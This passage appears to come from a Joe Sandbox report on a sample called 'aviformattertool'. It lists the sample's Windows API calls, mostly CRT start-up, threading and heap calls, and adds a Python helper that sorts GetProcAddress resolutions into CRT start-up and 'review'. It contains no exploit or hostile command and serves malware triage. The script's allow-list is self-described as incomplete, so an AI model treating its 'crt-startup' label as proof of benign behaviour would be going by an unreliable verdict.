• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,56FF5638), ref: 02A216FA
• CloseHandle.KERNEL32(00000000), ref: 02A2170F
  • Part of subcall function 02A21B90: GetCurrentProcessId.KERNEL32(?), ref: 02A21BE9
• WaitForSingleObject.KERNEL32(00000000,000000FF,56FF5638), ref: 02A2171F
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
• String ID:
• API String ID: 2227236058-0
• Opcode ID: 0dd0bc85fd682741f7128ba41bf093f38b04002d21c4e28914d965fd644b0684
• Instruction ID: 5a784eb746f097e024bdbc9af0266bb376bc427acf113fb772a89233afe968ae
                                                                                                                                                          • Opcode Fuzzy Hash: 0dd0bc85fd682741f7128ba41bf093f38b04002d21c4e28914d965fd644b0684
                                                                                                                                                          • Instruction Fuzzy Hash: 6C316471D403289BDF20DBE8CD84BADB7B9AF05714F140119E81DEB282EB309909CF61
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• __init_pointers.LIBCMT ref: 02A25D14
  • Part of subcall function 02A28482: RtlEncodePointer.NTDLL(00000000), ref: 02A28485
  • Part of subcall function 02A28482: __initp_misc_winsig.LIBCMT ref: 02A284A0
  • Part of subcall function 02A28482: GetModuleHandleW.KERNEL32(kernel32.dll,?,02A41568,00000008,00000003,02A40F4C,?,00000001), ref: 02A29201
  • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02A29215
  • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02A29228
  • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02A2923B
  • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02A2924E
  • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02A29261
  • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02A29274
  • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02A29287
  • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02A2929A
  • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02A292AD
  • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02A292C0
  • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02A292D3
  • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02A292E6
  • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02A292F9
  • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02A2930C
  • Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02A2931F
• __mtinitlocks.LIBCMT ref: 02A25D19
• __mtterm.LIBCMT ref: 02A25D22
  • Part of subcall function 02A25D8A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02A288B8
  • Part of subcall function 02A25D8A: _free.LIBCMT ref: 02A288BF
  • Part of subcall function 02A25D8A: RtlDeleteCriticalSection.NTDLL(02A43978), ref: 02A288E1
• __calloc_crt.LIBCMT ref: 02A25D47
• __initptd.LIBCMT ref: 02A25D69
• GetCurrentThreadId.KERNEL32 ref: 02A25D70
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
• String ID:
• API String ID: 3567560977-0
• Opcode ID: eea04c10c3f20094fca64045a79a8e10587fbb7c4c7f3ada1c7523c9e34c710d
• Instruction ID: 6458b30d60d127598f50976a0b4f6ee7ebe9f4e7ef78c74d66312f0ff8656fb7
• Opcode Fuzzy Hash: eea04c10c3f20094fca64045a79a8e10587fbb7c4c7f3ada1c7523c9e34c710d
• Instruction Fuzzy Hash: E3F06D32D993311EE66CBBBE6E4D64A278AEF41B34B600619F460D60C4FF11C84E8951
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02A233F3,00000000), ref: 02A2345B
• GetProcAddress.KERNEL32(00000000), ref: 02A23462
• RtlEncodePointer.NTDLL(00000000), ref: 02A2346E
• RtlDecodePointer.NTDLL(00000001), ref: 02A2348B
Strings
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoInitialize$combase.dll
• API String ID: 3489934621-340411864
• Opcode ID: 7cb5da81432f6b5b0e21d75c9656799dbceb63a7be2ab5ce38868d17e9eb0ee2
• Instruction ID: 747f65862b9fa6b4e84b7cab34d4c7ee125aa0518fea56c9071d5a2c4528947f
• Opcode Fuzzy Hash: 7cb5da81432f6b5b0e21d75c9656799dbceb63a7be2ab5ce38868d17e9eb0ee2
• Instruction Fuzzy Hash: 4DE0EDB5DD0350AAEF615F75EC49F0577E9B782B06F008864B502D1194CFBAE06A8F10
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02A23430), ref: 02A23530
• GetProcAddress.KERNEL32(00000000), ref: 02A23537
• RtlEncodePointer.NTDLL(00000000), ref: 02A23542
• RtlDecodePointer.NTDLL(02A23430), ref: 02A2355D
Strings
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 3489934621-2819208100
• Opcode ID: b90a7df1b1e539fdc79d50b4d34c0eee2b72296e58d2a0462b0ec6945c55ed8d
• Instruction ID: 353f0bfdc4a79940804cb41aba4590bdaa172927d6c0262a5a76315e0f1bb880
• Opcode Fuzzy Hash: b90a7df1b1e539fdc79d50b4d34c0eee2b72296e58d2a0462b0ec6945c55ed8d
• Instruction Fuzzy Hash: F6E0BFB5DD1304AFEB505F64AD0DB0576A9B782B05F108C64F606D1164DFB9E12ACB10
Uniqueness
Uniqueness Score: -1.00%
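A triage note on the three listings above, with an added example (written for this page; it is not part of the Joe Sandbox report or of its IDA plugin). The __init_pointers listing resolves FlsAlloc, FlsFree, FlsGetValue, FlsSetValue, InitializeCriticalSectionEx, CreateEventExW, CreateSemaphoreExW, SetThreadStackGuarantee and the thread-pool timer/wait entries through GetModuleHandleW("kernel32.dll") + GetProcAddress, and the two combase.dll listings resolve RoInitialize/RoUninitialize through LoadLibraryExW with dwFlags 00000800 (LOAD_LIBRARY_SEARCH_SYSTEM32) and store the result through RtlEncodePointer. Together with the LIBCMT names around them (__initp_misc_winsig, __mtinitlocks, __initptd, __calloc_crt) this is the MSVC CRT's own start-up code, not the sample's logic, so before weighing the "Extensive use of GetProcAddress" signature it helps to separate such CRT resolutions from the rest. The script below parses call lines in the plugin's format and labels each GetProcAddress accordingly. Assumptions: CRT_RESOLVED_NAMES is an allow-list built only from the names in these listings; reading a pending proc name from the fourth stack slot of a LoadLibraryExW line is an interpretation of how the plugin prints extra stack slots here; the VirtualProtect line in the sample is constructed and does not come from the report.

```python
"""Triage helper for Joe Sandbox IDA-plugin "APIs" listings: pull out every library
load and GetProcAddress resolution and label the ones that are MSVC CRT start-up
behaviour. Added example, not part of the report or of Joe Sandbox."""
import re
from dataclasses import dataclass
from typing import List, Optional

LOAD_LIBRARY_SEARCH_SYSTEM32 = 0x00000800   # dwFlags value in the LoadLibraryExW lines

# Names the MSVC CRT resolves at start-up itself: Fls* / *Ex / thread-pool entries via
# GetModuleHandleW("kernel32.dll") + GetProcAddress, and RoInitialize/RoUninitialize
# via a delay-loaded combase.dll. Built from the names in this listing; it is a
# starting baseline, not a complete CRT allow-list.
CRT_RESOLVED_NAMES = frozenset({
    "FlsAlloc", "FlsFree", "FlsGetValue", "FlsSetValue", "InitializeCriticalSectionEx",
    "CreateEventExW", "CreateSemaphoreExW", "SetThreadStackGuarantee",
    "CreateThreadpoolTimer", "SetThreadpoolTimer", "WaitForThreadpoolTimerCallbacks",
    "CloseThreadpoolTimer", "CreateThreadpoolWait", "SetThreadpoolWait",
    "CloseThreadpoolWait", "RoInitialize", "RoUninitialize",
})

# One call line, with or without the "Part of subcall function XXXXXXXX:" prefix and
# with or without an argument list (LIBCMT entries print none).
CALL_RE = re.compile(
    r"(?:Part of subcall function (?P<callee>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
HEX8_RE = re.compile(r"[0-9A-Fa-f]{8}")


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str               # call-site address printed after "ref:"
    callee: Optional[str]  # set for "Part of subcall function" lines


def _is_symbolic(tok: str) -> bool:
    """True for a recovered string literal (FlsAlloc), False for hex or '?'."""
    return tok != "?" and HEX8_RE.fullmatch(tok) is None


def parse_calls(text: str) -> List[Call]:
    """Parse every call line of an APIs block, in listing order."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.search(line)
        if m:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            calls.append(Call(m.group("api"), m.group("module"), args,
                              m.group("ref").upper(), m.group("callee")))
    return calls


def classify(name: Optional[str]) -> str:
    """'crt-startup' for a known CRT resolution; 'review' otherwise, including
    resolutions whose name the plugin did not recover."""
    return "crt-startup" if name in CRT_RESOLVED_NAMES else "review"


def dynamic_resolutions(calls: List[Call]) -> List[dict]:
    """One record per library load and per GetProcAddress, in listing order."""
    out, pending = [], None   # pending: proc name spilled into a LoadLibraryExW line
    for c in calls:
        if c.api in ("LoadLibraryExW", "GetModuleHandleW"):
            flags = int(c.args[2], 16) if c.api == "LoadLibraryExW" and len(c.args) > 2 \
                and HEX8_RE.fullmatch(c.args[2]) else 0
            # The plugin prints stack slots beyond the API's real parameters; in this
            # listing the string pushed for the next GetProcAddress sits in the fourth
            # slot. Reading it from there is an assumption about this layout.
            pending = c.args[3] if c.api == "LoadLibraryExW" and len(c.args) > 3 \
                and _is_symbolic(c.args[3]) else None
            out.append({"kind": "library", "ref": c.ref,
                        "name": c.args[0] if c.args else "<untracked>",
                        "system32_only": bool(flags & LOAD_LIBRARY_SEARCH_SYSTEM32)})
        elif c.api == "GetProcAddress":
            name = c.args[1] if len(c.args) > 1 and _is_symbolic(c.args[1]) else pending
            pending = None
            out.append({"kind": "proc", "ref": c.ref, "callee": c.callee,
                        "name": name or "<untracked>", "label": classify(name)})
    return out


def summarize(text: str) -> dict:
    """Count GetProcAddress resolutions per triage label."""
    counts = {"crt-startup": 0, "review": 0}
    for r in dynamic_resolutions(parse_calls(text)):
        if r["kind"] == "proc":
            counts[r["label"]] += 1
    return counts


# Sample input: lines copied from the listings above plus one constructed line
# (VirtualProtect at a made-up ref) standing in for a non-CRT resolution.
SAMPLE = "\n".join([
    "• Part of subcall function 02A28482: GetModuleHandleW.KERNEL32(kernel32.dll,?,02A41568,00000008,00000003,02A40F4C,?,00000001), ref: 02A29201",
    "• Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02A29215",
    "• Part of subcall function 02A28482: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02A292AD",
    "• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02A233F3,00000000), ref: 02A2345B",
    "• GetProcAddress.KERNEL32(00000000), ref: 02A23462",
    "• RtlEncodePointer.NTDLL(00000000), ref: 02A2346E",
    "• __CxxThrowException@8.LIBCMT ref: 02A216B5",
    "• GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 0041AAAA",  # constructed
])

if __name__ == "__main__":
    for rec in dynamic_resolutions(parse_calls(SAMPLE)):
        print(rec)
    print(summarize(SAMPLE))
```

Run it over the text of an APIs block copied from the report; anything labelled "review" (a resolved name outside the CRT baseline, or a GetProcAddress whose name the plugin could not recover) is what actually deserves a look in the disassembly, while a block whose resolutions are all "crt-startup" is the runtime doing its usual kernel32/combase bootstrapping.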

APIs
• TlsGetValue.KERNEL32(00000026,56FF5638,?,?,?,?,00000000,02A36A38,000000FF,02A2214A), ref: 02A21EEA
• TlsSetValue.KERNEL32(00000026,02A2214A,?,?,00000000), ref: 02A21F57
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A21F81
• HeapFree.KERNEL32(00000000), ref: 02A21F84
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: HeapValue$FreeProcess
• String ID:
• API String ID: 1812714009-0
• Opcode ID: 2b061c7ad79b0922ac3467387d821f6fdd15a85d68151c679da55e6c6381e2e0
• Instruction ID: 4fe3230b9259bc1fda9ba1bebbd1af08060f9927c38fbb38e7024dcaff9be501
• Opcode Fuzzy Hash: 2b061c7ad79b0922ac3467387d821f6fdd15a85d68151c679da55e6c6381e2e0
• Instruction Fuzzy Hash: 2F51C3759043289FD720CF2CD884B16BBE4FB89764F05865AF86997291DF31EC09CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• _ValidateScopeTableHandlers.LIBCMT ref: 02A35710
• __FindPESection.LIBCMT ref: 02A3572A
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: FindHandlersScopeSectionTableValidate
• String ID:
• API String ID: 876702719-0
• Opcode ID: fdee466a7e3458b3f1b9c42a8a40b6738dab9da3249431c0bdae190e4ba18f6c
• Instruction ID: edf162c2a6393a68c84682d1793fd285aba5cb6b232b2762c350231240448ade
• Opcode Fuzzy Hash: fdee466a7e3458b3f1b9c42a8a40b6738dab9da3249431c0bdae190e4ba18f6c
• Instruction Fuzzy Hash: BAA17D75E406558FCB22CF5CD981BA9B7B5FB48324F994669EC05AB340EF31E901CB90
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetStringTypeW.KERNEL32(00000001,004065FC,00000001,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DAD
• GetStringTypeA.KERNEL32(00000000,00000001,004065F8,00000001,?,?,00000000,00000000,00000001), ref: 00405DC7
• GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DFB
• MultiByteToWideChar.KERNEL32(00404E93,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E33
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E89
• GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E9B
Memory Dump Source
• Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
Similarity
• API ID: StringType$ByteCharMultiWide
• String ID:
• API String ID: 3852931651-0
• Opcode ID: 9ae0dc97d2ed4bc325ef346dcbaa1dfa56a56ee49ac91c7797361c074a205c54
• Instruction ID: 92337b5d5261d1f7514e6591bcc0141c6486a35b2866982676c545ec12be9aca
• Opcode Fuzzy Hash: 9ae0dc97d2ed4bc325ef346dcbaa1dfa56a56ee49ac91c7797361c074a205c54
• Instruction Fuzzy Hash: B1416C72540619AFCF109FA4DD85AAF3B69EB08710F10443AF912F2290C3399A619BA9
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02A11CB1
                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 02A11CBA
                                                                                                                                                          • InterlockedExchangeAdd.KERNEL32(02A47268,00000000), ref: 02A11CC6
                                                                                                                                                          • TerminateThread.KERNEL32(?,00000000), ref: 02A11CD4
                                                                                                                                                          • QueueUserAPC.KERNEL32(02A11E7C,?,00000000), ref: 02A11CE1
                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02A11CEC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1946104331-0
                                                                                                                                                          • Opcode ID: 046673b3136bd0f3d8d28b3673eef1de70eed6586efa0f1694da03950bad008c
                                                                                                                                                          • Instruction ID: fc64e151d444290f5a15a3b073812a097aa7480039ef77326918cd0664d0fba3
                                                                                                                                                          • Opcode Fuzzy Hash: 046673b3136bd0f3d8d28b3673eef1de70eed6586efa0f1694da03950bad008c
                                                                                                                                                          • Instruction Fuzzy Hash: FBF0AF71940204BFDB204B9ADD0DC6BFBBCEB86721B00465DF66A82190DF70E921CB60
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetVersionExA.KERNEL32 ref: 00403131
                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403166
                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004031C6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                                                                                          • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                                                                                          • API String ID: 1385375860-4131005785
                                                                                                                                                          • Opcode ID: af41626222cda295a30e89e95e8c01aa69820a81ffba76c46a2f88c2c2cc9610
                                                                                                                                                          • Instruction ID: 15aa791d7551e4111e6245bb3a1b8270ecaa7052e860947edacf4d8c3684a0cc
                                                                                                                                                          • Opcode Fuzzy Hash: af41626222cda295a30e89e95e8c01aa69820a81ffba76c46a2f88c2c2cc9610
                                                                                                                                                          • Instruction Fuzzy Hash: 9C3102719412486DEB31AB706C45BDA7F6C9B0A709F2404FFD145FA2C2D6398F898B19
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • std::exception::exception.LIBCMT ref: 02A218FF
                                                                                                                                                            • Part of subcall function 02A22453: std::exception::_Copy_str.LIBCMT ref: 02A2246C
                                                                                                                                                            • Part of subcall function 02A20CD0: __CxxThrowException@8.LIBCMT ref: 02A20D2E
                                                                                                                                                          • std::exception::exception.LIBCMT ref: 02A2195E
                                                                                                                                                          Strings
                                                                                                                                                          • boost unique_lock owns already the mutex, xrefs: 02A2194D
                                                                                                                                                          • $, xrefs: 02A21963
                                                                                                                                                          • boost unique_lock has no mutex, xrefs: 02A218EE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                                                                                                          • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                                                                                                          • API String ID: 2140441600-46888669
                                                                                                                                                          • Opcode ID: 92fa35429e8eecd7e7ed5b922ef39577a2fddaf69338faa8ae4b21521555a448
                                                                                                                                                          • Instruction ID: fd4d894fb0905aafe0a988860eec9b43344859084a609f59e3208fd484f24eec
                                                                                                                                                          • Opcode Fuzzy Hash: 92fa35429e8eecd7e7ed5b922ef39577a2fddaf69338faa8ae4b21521555a448
                                                                                                                                                          • Instruction Fuzzy Hash: DE2115B15483909FD710DF28C64475BBBE9BB88B08F504E5EF4A597280DBB9D808CF92
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02A12350
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02A12360
                                                                                                                                                          • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02A12370
                                                                                                                                                          • GetLastError.KERNEL32 ref: 02A1237A
                                                                                                                                                            • Part of subcall function 02A11712: __EH_prolog.LIBCMT ref: 02A11717
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                                                                                                          • String ID: pqcs
                                                                                                                                                          • API String ID: 1619523792-2559862021
                                                                                                                                                          • Opcode ID: 63a250d90dcb77d1017ce1f8df2c515da88dfa1f02bdd9147f821b48484f7a70
                                                                                                                                                          • Instruction ID: 1ced728481a3b64a412d823e9192d406e8373b2882b670b1d3f2e6c994adb3b7
                                                                                                                                                          • Opcode Fuzzy Hash: 63a250d90dcb77d1017ce1f8df2c515da88dfa1f02bdd9147f821b48484f7a70
                                                                                                                                                          • Instruction Fuzzy Hash: B1F054B1980318AFDB10AF749D49BABB7ADEF02711F00456AF905D3140FF70D9158B91
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A14035
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 02A14042
                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A14049
                                                                                                                                                          • std::exception::exception.LIBCMT ref: 02A14063
                                                                                                                                                            • Part of subcall function 02A1A64A: __EH_prolog.LIBCMT ref: 02A1A64F
                                                                                                                                                            • Part of subcall function 02A1A64A: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02A1A65E
                                                                                                                                                            • Part of subcall function 02A1A64A: __CxxThrowException@8.LIBCMT ref: 02A1A67D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                                                                                                          • String ID: bad allocation
                                                                                                                                                          • API String ID: 3112922283-2104205924
                                                                                                                                                          • Opcode ID: e6e426f8e37fbdafebfde55af489480f9c7eea5b9217fab209e064611147ae1a
                                                                                                                                                          • Instruction ID: 4319dd3e4703a86768800e9bb22b677279d643a5691b0a1db616a888e59bf7de
                                                                                                                                                          • Opcode Fuzzy Hash: e6e426f8e37fbdafebfde55af489480f9c7eea5b9217fab209e064611147ae1a
                                                                                                                                                          • Instruction Fuzzy Hash: AAF08CB1E80209ABCB01EFE4CE18BEFB779EB08305F404599F914A2240DF388219CF91
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetStartupInfoA.KERNEL32(?), ref: 0040489B
                                                                                                                                                          • GetFileType.KERNEL32(00000800), ref: 00404941
                                                                                                                                                          • GetStdHandle.KERNEL32(-000000F6), ref: 0040499A
                                                                                                                                                          • GetFileType.KERNEL32(00000000), ref: 004049A8
                                                                                                                                                          • SetHandleCount.KERNEL32 ref: 004049DF
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileHandleType$CountInfoStartup
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1710529072-0
                                                                                                                                                          • Opcode ID: 98b932809ab249fb6d2b1e7eb3a8536e99f5defad770c06167dc9539152dd1ea
                                                                                                                                                          • Instruction ID: 8fe4441db6cd525bc9d87713bb4edde2cd7c7f14dbffc3b3aa205102a4a4cd07
                                                                                                                                                          • Opcode Fuzzy Hash: 98b932809ab249fb6d2b1e7eb3a8536e99f5defad770c06167dc9539152dd1ea
                                                                                                                                                          • Instruction Fuzzy Hash: 2B5113F26003118BD7208B38CD48B673BA0BB91320F19473AE696FB2E1D73C8855C75A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 02A219D0: CloseHandle.KERNEL32(00000000,56FF5638), ref: 02A21A21
                                                                                                                                                            • Part of subcall function 02A219D0: WaitForSingleObject.KERNEL32(?,000000FF,56FF5638,?,?,?,?,56FF5638,02A219A3,56FF5638), ref: 02A21A38
                                                                                                                                                          • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02A21C9E
                                                                                                                                                          • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02A21CBE
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02A21CF7
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02A21D4B
                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 02A21D52
                                                                                                                                                            • Part of subcall function 02A1418C: CloseHandle.KERNEL32(00000000,?,02A21C85), ref: 02A141B0
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
Uniqueness
Uniqueness Score: -1.00%

APIs
• InterlockedExchange.KERNEL32(?,00000001), ref: 02A120AC
• SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02A120CD
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A120D8
• InterlockedDecrement.KERNEL32(?), ref: 02A1213E
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A121A6
Yara matches
Similarity
• API ID: Interlocked$Exchange$DecrementTimerWaitable
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 02A1E07D
  • Part of subcall function 02A11A01: TlsGetValue.KERNEL32 ref: 02A11A0A
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A1E0FC
